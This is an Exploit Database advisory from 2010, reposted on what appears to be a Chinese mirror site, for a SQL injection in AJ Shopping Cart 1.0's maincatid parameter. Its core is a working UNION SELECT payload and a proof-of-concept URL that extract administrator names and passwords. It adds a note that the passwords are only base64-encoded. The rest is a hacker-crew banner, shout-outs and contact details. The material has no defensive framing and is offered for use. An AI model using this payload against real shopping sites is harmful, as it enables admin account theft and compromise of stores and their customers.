AJ Shopping Cart 1.0 (maincatid) – SQL Injection

• Exploit Database
• 10 阅读

• 作者： v3n0m
  日期： 2010-04-22
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12349/

•  ) )) ( ( ( (( ) ) 
  ( /(( /( ( ( /(( (( )\ ))\ ))\ ))\ ) )\ ) ( /(( /( 
  )\())\()))\ ))\()) )\)\ )\ (()/(()/(((()/(()/((()/( )\()) )\())
   ((_)((_)\(()/( ((_)((((_)((((_)(((_)(/(_))(_)) )\/(_))(_))/(_))(_)\|((_)\ 
  __ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_))_((_)_ ((_)
  \ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \| \| __| _ \ ||_ _|| \| | |/ / 
   \ V / (_) || (_ |\ V / / _ \| (__ / _ \ | /| |) | _|| / |__ | | | .` | ' <
  |_| \___/\___| |_| /_/ \_\\___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\
  										.WEB.ID
  -----------------------------------------------------------------------
   AJ Shopping Cart v1.0 (maincatid) SQL Injection Vulnerability
  -----------------------------------------------------------------------
  Author	: v3n0m
  Site	: http://yogyacarderlink.web.id/
  Date		: April, 23-2010
  Location	: Jakarta, Indonesia
  Time Zone	: GMT +7:00
  ----------------------------------------------------------------
  
  Affected software description:
  ~~~~~~~~~~~~~~~~~~~~~~~~~~
  
  Application	: AJ Shopping Cart
  Vendor	: http://www.ajsquare.com/
  Price		: $1999.00 USD
  Version 	: v1.0
  Google Dork	: Use your brain & imagination:)
  
  The AJ Shopping Cart V 1.0 attracts many customers for developing their businesses. Our 
  php shopping cart is supplied with easy and vivid provisions to help the users with 
  all requirements listed for enhancing the business. The merits you can really 
  rely on success, complete establishment and enthralling growth in running a on line store. 
  There are steps taken to add more colors in the development of our shopping Cart. 
  It has come up with new features for controlling the store. 
  ----------------------------------------------------------------
  
  Exploit:
  ~~~~~~~
  
  -99999/**/union/**/all/**/select/**/group_concat(admin_name,char(58),admin_password)v3n0m/**/from/**/admin_table--
  
  
  SQLi p0c:
  ~~~~~~~
  
  http://127.0.0.1/[path]/?do=featured&action=showmaincatlanding&maincatid=[SQLi]
  http://127.0.0.1/[path]/?do=featured&action=showmaincatlanding&maincatid=-99999/**/union/**/all/**/select/**/group_concat(admin_name,char(58),admin_password)v3n0m/**/from/**/admin_table--
  
  ** Password encrypted "base64_encode"
  ----------------------------------------------------------------
  
  Shoutz:
  ~~~~
  
  - LeQhi,lingah,GheMaX,spykit,m4rco,z0mb13,ast_boy,eidelweiss,xx_user,^pKi^,tian,zhie_o,JaLi-
  - setanmuda,oche_an3h,onez,Joglo,d4rk_kn19ht,Cakill Schumbag
  - kiddies,whitehat,c4uR [aku benci dirimu, aku cinta martabak mu],mywisdom,yadoy666,udhit
  - BLaSTER & TurkGuvenligi & Agd_scorp (Turkey Hackers)
  - elicha cristia [kamu kemana aja? Mizz You :)]
  - N.O.C & Technical Support @office
  - #yogyacarderlink @irc.dal.net
  ----------------------------------------------------------------
  Contact:
  ~~~~
  
  v3n0m | YOGYACARDERLINK CREW | v3n0m666[0x40]live[0x2E]com
  Homepage: http://yogyacarderlink.web.id/
  	http://v3n0m.blogdetik.com/
  	http://elich4.blogspot.com/ << Update donk >_<
  
  ---------------------------[EOF]--------------------------------